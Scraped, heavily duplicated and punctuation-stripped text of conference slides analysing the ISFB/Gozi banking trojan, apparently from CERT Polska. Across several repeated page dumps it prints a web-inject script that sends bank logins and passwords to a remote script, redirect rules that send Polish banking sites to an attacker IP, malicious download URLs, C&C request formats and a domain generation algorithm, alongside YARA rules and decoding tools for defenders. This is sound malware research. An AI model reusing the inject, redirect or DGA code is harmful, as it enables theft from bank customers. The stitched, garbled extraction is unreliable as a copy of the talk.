URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data

3958

02122016 ISFB

httpslokalhostpltalksbotconf20161 4058

URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))

PYTHON

crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887

4058

URL format

02122016 ISFB

httpslokalhostpltalksbotconf20161 4158

URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc

4158

02122016 ISFB

httpslokalhostpltalksbotconf20161 4258

CampC respone

4258

02122016 ISFB

httpslokalhostpltalksbotconf20161 4358

CampC respone

4358

02122016 ISFB

httpslokalhostpltalksbotconf20161 4458

Wiki

Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen

Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES

4458

02122016 ISFB

httpslokalhostpltalksbotconf20161 4558

CampC respone

4558

02122016 ISFB

httpslokalhostpltalksbotconf20161 4658

Command and Control

02122016 ISFB

httpslokalhostpltalksbotconf20161 4758

IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break

4758

02122016 ISFB

httpslokalhostpltalksbotconf20161 4858

IAP

4858

02122016 ISFB

httpslokalhostpltalksbotconf20161 4958

IAP

4958

02122016 ISFB

httpslokalhostpltalksbotconf20161 5058

DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]

5058

Dreambot

02122016 ISFB

httpslokalhostpltalksbotconf20161 5158

Dreambot

5158

02122016 ISFB

httpslokalhostpltalksbotconf20161 5258

Dreambot

5258

02122016 ISFB

httpslokalhostpltalksbotconf20161 5358

Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper

5358

02122016 ISFB

httpslokalhostpltalksbotconf20161 5458

The Endor not

02122016 ISFB

httpslokalhostpltalksbotconf20161 5558

Offsprings and Cousins

Common RootsPayloads

NymainPowersniff PunchyBagg

middotmiddot

BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common

middotmiddotmiddot

5558

Recap

02122016 ISFB

httpslokalhostpltalksbotconf20161 5658

Recap

One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb

middotmiddotmiddotmiddotmiddotmiddotmiddot

5658

02122016 ISFB

httpslokalhostpltalksbotconf20161 5758

Kudospeople that knowingly (or not) halped us

SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

5758

02122016 ISFB

httpslokalhostpltalksbotconf20161 5858

Q amp A

infocertpl wwwcertpl

CERTPolska CERTPolska

CERTPolska CERTPolska_en

mak makcertpl

Page 24: ISFB - Botconf 2020 · 2016. 12. 2. · 02/12/2016 ISFB  1/58 ISFB Still Live and Kicking Maciej Kotowicz

02122016 ISFB

httpslokalhostpltalksbotconf20161 2458

Static cfg

2458

02122016 ISFB

httpslokalhostpltalksbotconf20161 2558

Man in the Browser or where my goes my mony

Dynamic config

02122016 ISFB

httpslokalhostpltalksbotconf20161 2658

Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]

C

2658

02122016 ISFB

httpslokalhostpltalksbotconf20161 2758

Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()

2758

02122016 ISFB

httpslokalhostpltalksbotconf20161 2858

Web Actions

FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

2858

02122016 ISFB

httpslokalhostpltalksbotconf20161 2958

Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin

2958

02122016 ISFB

httpslokalhostpltalksbotconf20161 3058

The Bot

Registry Keys

02122016 ISFB

httpslokalhostpltalksbotconf20161 3158

Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12

InstallClientNetCfgLastTaskLastConfig

middotmiddotmiddotmiddotmiddot

3158

02122016 ISFB

httpslokalhostpltalksbotconf20161 3258

Other Acctions

GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

3258

02122016 ISFB

httpslokalhostpltalksbotconf20161 3358

Calling Home

02122016 ISFB

httpslokalhostpltalksbotconf20161 3458

ET phone home

Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network

middotmiddotmiddotmiddot

3458

02122016 ISFB

httpslokalhostpltalksbotconf20161 3558

DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)

PYTHON

3558

TOR

02122016 ISFB

httpslokalhostpltalksbotconf20161 3658

TOR

3658

02122016 ISFB

httpslokalhostpltalksbotconf20161 3758

P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet

C

3758

02122016 ISFB

httpslokalhostpltalksbotconf20161 3858

Internet is Hard

3858

02122016 ISFB

httpslokalhostpltalksbotconf20161 3958

URL formathttpssuser5fid=4uampversion5fid=luamppassphrase=sampsocks=luampversion=luampcrc=8x tfctqphpmkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY oxsxc=kcxsfxampversion=212356ampuser=aa16a132f1689c4d4b2eb59024d986c3ampserver=12ampid=1000ampcrc=1dc690f cnctldimages8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Ujpeg t[RAND][RAND]=data

3958

02122016 ISFB

httpslokalhostpltalksbotconf20161 4058

URL formatdecode_req = lambda d decrypt(ddecode(base64SKEY)) d=resub(_([0‐9A‐Fa‐f]2)lambda x chr(int(xgroup(1)16))d) try e=ddecode(base64) except Exception as e d=d+== pprintpprint(dict(map(lambda x xsplit(=) decode_req(d)strip(x00)split(amp))))

PYTHON

crc 7001380 id 1065ppc xi server 12 soft 1 user 0c0d784a0cf755970edbdf4c0cb27fca version 214887

4058

URL format

02122016 ISFB

httpslokalhostpltalksbotconf20161 4158

URL formattphp amp get new task amp Used until Sep 2015 cphp amp get new config amp Used until Sep 2015 dphp amp send stolen data amp Used until Sep 2015 imagesgif amp get new task amp current format imagesjpeg amp get new config amp current format imagesbmp amp send stolen data amp current format imagesavi amp download 2nd stage dll amp not every campc

4158

02122016 ISFB

httpslokalhostpltalksbotconf20161 4258

CampC respone

4258

02122016 ISFB

httpslokalhostpltalksbotconf20161 4358

CampC respone

4358

02122016 ISFB

httpslokalhostpltalksbotconf20161 4458

Wiki

Serpent is a symmetric key block cipher that was a finalistin the Advanced Encryption Standard (AES) contest whereit was ranked second to Rijndael Serpent was designed byRoss Anderson Eli Biham and Lars Knudsen

Like other AES submissions Serpent has a block size of128 bits and supports a key size of 128 192 or 256 bits[2]The cipher is a 32-round substitution-permutationnetwork operating on a block of four 32-bit words Eachround applies one of eight 4-bit to 4-bit S-boxes 32 timesin parallel Serpent was designed so that all operations canbe executed in parallel using 32 bit slices This maximizesparallelism but also allows use of the extensivecryptanalysis work performed on DES

4458

02122016 ISFB

httpslokalhostpltalksbotconf20161 4558

CampC respone

4558

02122016 ISFB

httpslokalhostpltalksbotconf20161 4658

Command and Control

02122016 ISFB

httpslokalhostpltalksbotconf20161 4758

IAPrewrite ^fileto()(bin) get128phpx=$1 break rewrite ^images()(bmp) dataphpx=$1$2 break rewrite ^images()(avi) loaderphpx=$1$2 break rewrite ^images()(gif) taskphpx=$1$2 break rewrite ^images()(jpeg) configphpx=$1$2 break

4758

02122016 ISFB

httpslokalhostpltalksbotconf20161 4858

IAP

4858

02122016 ISFB

httpslokalhostpltalksbotconf20161 4958

IAP

4958

02122016 ISFB

httpslokalhostpltalksbotconf20161 5058

DreambotRewriteEngine on RewriteRule ^c(+)php$ new_chandlerphp [LQSA] RewriteRule ^t(+)php$ new_thandlerphp [LQSA] RewriteRule ^d(+)php$ new_dhandlerphp [LQSA] RewriteRule ^images()(bmp) new_dhandlerphpq=$1$2 [LQSA] RewriteRule ^images()(gif) new_thandlerphpq=$1$2 [LQSA] RewriteRule ^images()(jpeg) new_chandlerphpq=$1$2 [LQSA]

5058

Dreambot

02122016 ISFB

httpslokalhostpltalksbotconf20161 5158

Dreambot

5158

02122016 ISFB

httpslokalhostpltalksbotconf20161 5258

Dreambot

5258

02122016 ISFB

httpslokalhostpltalksbotconf20161 5358

Dreambotrule isfb_dreambot banker meta author = mak module = isfb strings $str0 = vmware fullword $str1 = vbox fullword $str2 = virtual hd fullword $str4 = qemu fullword $str3 = c321txt fullword condition all of them and isfb_dropper

5358

02122016 ISFB

httpslokalhostpltalksbotconf20161 5458

The Endor not

02122016 ISFB

httpslokalhostpltalksbotconf20161 5558

Offsprings and Cousins

Common RootsPayloads

NymainPowersniff PunchyBagg

middotmiddot

BolekKBOT - based on goziRovnix - ISFB was ring3 payload protected by rovnixVawtrak - Nothing in common

middotmiddotmiddot

5558

Recap

02122016 ISFB

httpslokalhostpltalksbotconf20161 5658

Recap

One of the oldest bankers under active developmentInteresting solutionsVarious methods of infectionElaborate communication methods DGAP2PTOROld bugs die hard]Read paper for more details]Code soon available at makgithubrandom-stuffisfb

middotmiddotmiddotmiddotmiddotmiddotmiddot

5658

02122016 ISFB

httpslokalhostpltalksbotconf20161 5758

Kudospeople that knowingly (or not) halped us

SlavoPaul BlackKafeinePeter KrusePiotr KijewskiJarosław JedynakHorghFrank Ruiz

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

5758

02122016 ISFB

httpslokalhostpltalksbotconf20161 5858

Q amp A

infocertpl wwwcertpl

CERTPolska CERTPolska

CERTPolska CERTPolska_en

mak makcertpl

Page 25: ISFB - Botconf 2020 · 2016. 12. 2. · 02/12/2016 ISFB  1/58 ISFB Still Live and Kicking Maciej Kotowicz

02122016 ISFB

httpslokalhostpltalksbotconf20161 2558

Man in the Browser or where my goes my mony

Dynamic config

02122016 ISFB

httpslokalhostpltalksbotconf20161 2658

Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]

C

2658

02122016 ISFB

httpslokalhostpltalksbotconf20161 2758

Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()

2758

02122016 ISFB

httpslokalhostpltalksbotconf20161 2858

Web Actions

FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

2858

Web Actions

ACTION REDIRECT - Target myjs128js -> http51016736dimyjs128_plv3js
ACTION REDIRECT - Target myjs28js -> http51016736dimyjs28_plv3js
ACTION REDIRECT - Target ats8gatephp -> http51016736azatsbmidgate128php
ACTION REDIRECT - Target httpswwwcentrum24pl -> http51016736fkcen1php
ACTION REDIRECT - Target httpscompanynetmbankpl -> http51016736fkmbiz1php
ACTION FILE - Target prv
ACTION VNC - Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32bin httpthesellingoutletcomp64bin
ACTION VNC - Target httpscompanynetmbankpl | source httpthesellingoutletcomp32bin httpthesellingoutletcomp64bin
ACTION VNC - Target httpsiri | source httpthesellingoutletcomp32bin httpthesellingoutletcomp64bin
ACTION VNC - Target httpskiri | source httpthesellingoutletcomp32bin httpthesellingoutletcomp64bin
ACTION VNC - Target httpsibiznes2 | source httpthesellingoutletcomp32bin httpthesellingoutletcomp64bin
ACTION VNC - Target httpsplhomebankin | source httpthesellingoutletcomp32bin httpthesellingoutletcomp64bin
ACTION VNC - Target httpshbfaces | source httpthesellingoutletcomp32bin httpthesellingoutletcomp64bin

The Bot

Registry Keys

Software\AppDataLow\Software\Microsoft\[A-F0-9]{8}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{4}-[A-F0-9]{12}

· Install
· Client
· NetCfg
· LastTask
· LastConfig

Other Actions

· GET_CERTS
· GET_COOKIES
· GET_SYSINFO
· LOAD_EXE
· GET_FILES
· SOCKS_START
· GET_KEYLOG
· GET_MAIL
· GET_FTP
· VNC_START
· URL_BLOCK

Calling Home

ET phone home

· Static domains inside configuration files
· DGA based on template and current date
· C&C hidden in TOR network
· P2P network

DGA (Python)

# Fragment of the generator method: LsaRandom, words, kwargs and self
# come from the surrounding class, which is not shown on the slide.
rnd = LsaRandom()
rnd.seed = (((kwargs['seed'] << 16) & 0xffffffff) + kwargs['season'] + kwargs['lsa_seed']) & 0xffffffff
# the second assignment overrides the first, as on the slide
rnd.seed = (1 << 16) + kwargs['season'] - 0x124676D0
r = []
for i in range(kwargs['count']):
    suf = kwargs['tld'][(rnd.rnd >> 1) % len(kwargs['tld'])]  # rnd.choose(kwargs['tld'])
    dom_l = rnd.rnd % self.DGA_MIN_LEN + self.DGA_MIN_LEN
    wc = 0
    dom = []
    while wc < dom_l:
        d = rnd.choose(words)
        ws = len(d)
        if not rnd.rnd % 3:
            ws -= 2
        if wc + ws > self.DGA_MAX_LEN:
            continue
        dom.append(d[:ws])
        wc += ws
    r.append(''.join(dom) + suf)

TOR

P2P (C)

typedef struct {
    DWORD magic;        // 0x395f2ec1
    DWORD my_secret;
    DWORD his_secret;
    BYTE  cmd0;
    BYTE  cmd1;
    BYTE  data[];
} isfb_p2p_inner_packet;

typedef struct {
    BYTE  flags;
    DWORD salt;                 // 4 random higher bytes of keys
    isfb_p2p_inner_packet p;    // encrypted
} isfb_p2p_packet;

Internet is Hard

URL format

http://%s/%s?user%5fid=%4u&version%5fid=%lu&passphrase=%s&socks=%lu&version=%lu&crc=%8x

tfctq.php?mkvf=KPgnjc3RohdH4zDttU9wItzEGB6cEz2jeDJWROI6FbIpqN9F6N3OOHUzISvptToYm+txOpUvU2YtY

oxsxc=kcxsfx&version=212356&user=aa16a132f1689c4d4b2eb59024d986c3&server=12&id=1000&crc=1dc690f

cnc.tld/images/8Gmj7f1bp976veQbwY5XTyLFJl2QiH3b3X6ts7Yxd7nmkuXV6Yrt6mPUdSf2Ul jOBc27CVHf2WIxVsGgPv49qA_2B_2FdeXKWKVcPIuyXr4JBumUByAwRtPom91zP7FSaj2Uj.jpeg

t[RAND].php?[RAND]=data

URL format (Python)

import re
import pprint

# decrypt() and SKEY come from the author's tooling (the Serpent key is not on the slide)
decode_req = lambda d: decrypt(d.decode('base64'), SKEY)

# undo the bot's '_XX' hex escaping of URL-unsafe base64 characters
d = re.sub('_([0-9A-Fa-f]{2})', lambda x: chr(int(x.group(1), 16)), d)
# the bot drops base64 padding; restore it when decoding fails
try:
    e = d.decode('base64')
except Exception as e:
    d = d + '=='
pprint.pprint(dict(map(lambda x: x.split('='), decode_req(d).strip('\x00').split('&'))))

{'crc': '7001380',
 'id': '1065',
 'ppc': 'xi',
 'server': '12',
 'soft': '1',
 'user': '0c0d784a0cf755970edbdf4c0cb27fca',
 'version': '214887'}

URL format

t*.php        | get new task           | used until Sep 2015
c*.php        | get new config         | used until Sep 2015
d*.php        | send stolen data       | used until Sep 2015
/images/*.gif  | get new task           | current format
/images/*.jpeg | get new config         | current format
/images/*.bmp  | send stolen data       | current format
/images/*.avi  | download 2nd stage dll | not every C&C
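Request triage for the path and extension scheme in the table above, as an added example that is not the author's code: it classifies a proxy-log URL and reverses the URL mangling so the blob could be handed to the Serpent decrypt step, which is left out because the key is not on the page. It assumes the bot escapes URL-unsafe base64 characters as `_XX` (as `_2B_2F` on the earlier slide), drops padding and splits the blob across path segments; `mangle_blob`, the host `c2.example` and the sample payload are constructed here.

```python
import base64
import re
from urllib.parse import urlsplit

# Request types from the slide's table.
OLD_FORMAT = {"t": "get new task", "c": "get new config", "d": "send stolen data"}
NEW_FORMAT = {"gif": "get new task", "jpeg": "get new config",
              "bmp": "send stolen data", "avi": "download 2nd stage dll"}


def classify_request(url):
    """Return (request type, encoded blob) for an ISFB-style C&C URL, else None."""
    parts = urlsplit(url)
    m = re.match(r"^/images/(.+)\.(gif|jpeg|bmp|avi)$", parts.path)
    if m:
        return NEW_FORMAT[m.group(2)], m.group(1)
    # old format: t<rand>.php?<rand>=<blob>; the leading letter selects the handler
    m = re.match(r"^/([tcd])[^/]*\.php$", parts.path)
    if m:
        return OLD_FORMAT[m.group(1)], parts.query.partition("=")[2]
    return None


def recover_blob(token):
    """Undo the URL mangling so the blob is plain base64-decoded ciphertext again."""
    s = token.replace("/", "")                        # path separators split the blob
    s = re.sub(r"_([0-9A-Fa-f]{2})",                   # _2B -> '+', _2F -> '/', _3D -> '='
               lambda m: chr(int(m.group(1), 16)), s)
    s = s.rstrip("=")
    s += "=" * (-len(s) % 4)                           # restore dropped padding
    return base64.b64decode(s, validate=True)          # rejects characters outside base64


def mangle_blob(raw, seg=20):
    """Mirror of recover_blob (assumed bot behaviour); used only to build the sample path."""
    s = base64.b64encode(raw).decode().rstrip("=")
    s = s.replace("+", "_2B").replace("/", "_2F")
    return "/".join(s[i:i + seg] for i in range(0, len(s), seg))


# Constructed sample payload standing in for an encrypted request body;
# 0..255 guarantees '+' and '/' show up in the base64 so the escaping is exercised.
SAMPLE_RAW = bytes(range(256))
SAMPLE_URL = "http://c2.example/images/" + mangle_blob(SAMPLE_RAW) + ".jpeg"


def triage(url):
    """Classify one URL and recover its blob: (request type, bytes) or None."""
    hit = classify_request(url)
    if hit is None:
        return None
    kind, token = hit
    return kind, recover_blob(token)
```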

C&C response

Wiki

Serpent is a symmetric key block cipher that was a finalist in the Advanced Encryption Standard (AES) contest, where it was ranked second to Rijndael. Serpent was designed by Ross Anderson, Eli Biham and Lars Knudsen.

Like other AES submissions, Serpent has a block size of 128 bits and supports a key size of 128, 192 or 256 bits.[2] The cipher is a 32-round substitution-permutation network operating on a block of four 32-bit words. Each round applies one of eight 4-bit to 4-bit S-boxes 32 times in parallel. Serpent was designed so that all operations can be executed in parallel, using 32 bit slices. This maximizes parallelism, but also allows use of the extensive cryptanalysis work performed on DES.

C&C response

Command and Control

IAP

rewrite ^/fileto/(.*)\.(bin)  /get128.php?x=$1    break;
rewrite ^/images/(.*)\.(bmp)  /data.php?x=$1$2    break;
rewrite ^/images/(.*)\.(avi)  /loader.php?x=$1$2  break;
rewrite ^/images/(.*)\.(gif)  /task.php?x=$1$2    break;
rewrite ^/images/(.*)\.(jpeg) /config.php?x=$1$2  break;

IAP

Dreambot

RewriteEngine on
RewriteRule ^c(.+)\.php$ new_chandler.php [L,QSA]
RewriteRule ^t(.+)\.php$ new_thandler.php [L,QSA]
RewriteRule ^d(.+)\.php$ new_dhandler.php [L,QSA]
RewriteRule ^images/(.*)\.(bmp)  new_dhandler.php?q=$1$2 [L,QSA]
RewriteRule ^images/(.*)\.(gif)  new_thandler.php?q=$1$2 [L,QSA]
RewriteRule ^images/(.*)\.(jpeg) new_chandler.php?q=$1$2 [L,QSA]

Dreambot

rule isfb_dreambot : banker
{
    meta:
        author = "mak"
        module = "isfb"
    strings:
        $str0 = "vmware" fullword
        $str1 = "vbox" fullword
        $str2 = "virtual hd" fullword
        $str4 = "qemu" fullword
        $str3 = "c321.txt" fullword
    condition:
        all of them and isfb_dropper
}

The End, or not

Offsprings and Cousins

Common Roots / Payloads

· Nymaim
· Powersniff / PunchyBagg

· Bolek / KBOT - based on gozi
· Rovnix - ISFB was the ring3 payload protected by rovnix
· Vawtrak - nothing in common

Recap

· One of the oldest bankers under active development
· Interesting solutions
· Various methods of infection
· Elaborate communication methods: DGA, P2P, TOR
· Old bugs die hard
· Read the paper for more details
· Code soon available at mak's github: random-stuff/isfb

Kudos: people that knowingly (or not) helped us

· Slavo
· Paul Black
· Kafeine
· Peter Kruse
· Piotr Kijewski
· Jarosław Jedynak
· Horgh
· Frank Ruiz

Q & A

info@cert.pl    www.cert.pl

CERTPolska      CERTPolska

CERTPolska      CERTPolska_en

mak             mak@cert.pl

Page 26: ISFB - Botconf 2020 · 2016. 12. 2. · 02/12/2016 ISFB  1/58 ISFB Still Live and Kicking Maciej Kotowicz

02122016 ISFB

httpslokalhostpltalksbotconf20161 2658

Dynamic config typedef structure DWORD size BYTE data[size] inject_elem typedef structure inject_elem target url glob inject_elem action or regex inject_elem params[4] other params inject_chunk typedef injects_t inject_chunk[]

C

2658

02122016 ISFB

httpslokalhostpltalksbotconf20161 2758

Web Injectsvar bn = US_ + BOFA_1 var bot_id = ID_ + bn var sa = decode64() var req = send=0ampu_bot_id= + bot_id + ampbn= + bn+ amppage=8ampu_login=ampu_pass=amplog= + get_me_core sendScriptRequest(sa req function statusCall1() var element = documentgetElementById(loader) elementparentNoderemoveChild(element) ) )()

2758

02122016 ISFB

httpslokalhostpltalksbotconf20161 2858

Web Actions

FILESCREENSHOTHIDDENNEWGRABVIDEOPROCESSPOSTVNC

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

2858

02122016 ISFB

httpslokalhostpltalksbotconf20161 2958

Web ActionsACTION REDIRECT ‐ Target myjs128js ‐gt http51016736dimyjs128_plv3js ACTION REDIRECT ‐ Target myjs28js ‐gt http51016736dimyjs28_plv3js ACTION REDIRECT ‐ Target ats8gatephp ‐gt http51016736azatsbmidgate128php ACTION REDIRECT ‐ Target httpswwwcentrum24pl ‐gt http51016736fkcen1php ACTION REDIRECT ‐ Target httpscompanynetmbankpl ‐gt http51016736fkmbiz1php ACTION FILE ‐ Target prv ACTION VNC ‐ Target httpswwwpekaobiznes24 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpscompanynetmbankpl | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpskiri | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsibiznes2 | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpsplhomebankin | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64binACTION VNC ‐ Target httpshbfaces | source httpthesellingoutletcomp32binhttpthesellingoutletcomp64bin

2958

02122016 ISFB

httpslokalhostpltalksbotconf20161 3058

The Bot

Registry Keys

02122016 ISFB

httpslokalhostpltalksbotconf20161 3158

Registry KeysSoftwareAppDataLowSoftwareMicrosoft [A‐F0‐9]8‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]4‐[A‐F0‐9]12

InstallClientNetCfgLastTaskLastConfig

middotmiddotmiddotmiddotmiddot

3158

02122016 ISFB

httpslokalhostpltalksbotconf20161 3258

Other Acctions

GET_CERTSGET_COOKIESGET_SYSINFOLOAD_EXEGET_FILESSOCKS_STARTGET_KEYLOGGET_MAILGET_FTPVNC_STARTURL_BLOCK

middotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddotmiddot

3258

02122016 ISFB

httpslokalhostpltalksbotconf20161 3358

Calling Home

02122016 ISFB

httpslokalhostpltalksbotconf20161 3458

ET phone home

Static domains inside configuration filesDGA based on template and current dataCampC hidden in TOR networkP2P network

middotmiddotmiddotmiddot

3458

02122016 ISFB

httpslokalhostpltalksbotconf20161 3558

DGA rnd = LsaRandom() rndseed = (((kwargs[seed] ltlt 16)amp0xffffffff) + kwargs[season] + kwargs[lsa_seed]) amp 0xffffffff rndseed = (1 ltlt 16) + kwargs[season] ‐ 0x124676D0 r=[] for i in range(kwargs[count]) suf = kwargs[tld][(rndrnd gtgt 1) len(kwargs[tld])]rndchoose(kwargs[tld]) dom_l = rndrnd selfDGA_MIN_LEN + selfDGA_MIN_LEN wc = 0 dom = [] while wc lt dom_l d = rndchoose(words) ws = len(d) if not rndrnd 3 ws =2 if wc + ws gt selfDGA_MAX_LEN continue domappend(d[ws]) wc += ws rappend(join(dom) +suf)

PYTHON

3558

TOR

02122016 ISFB

httpslokalhostpltalksbotconf20161 3658

TOR

3658

02122016 ISFB

httpslokalhostpltalksbotconf20161 3758

P2P typedef struct DWORD magic 0x395f2ec1 DWORD my_secret DWORD his_secret BYTE cmd0 BYTE cmd1 BYTE data[] isfb_p2p_inner_packet typedef struct BYTE flags DWORD salt 4 random higher bytes of keys isfb_p2p_inner_packet p encrypted isfb_p2p_packet

C

3758

02122016 ISFB

httpslokalhostpltalksbotconf20161 3858

Internet is Hard

3858

02122016 ISFB

httpslokalhostpltalksbotconf20161 3958

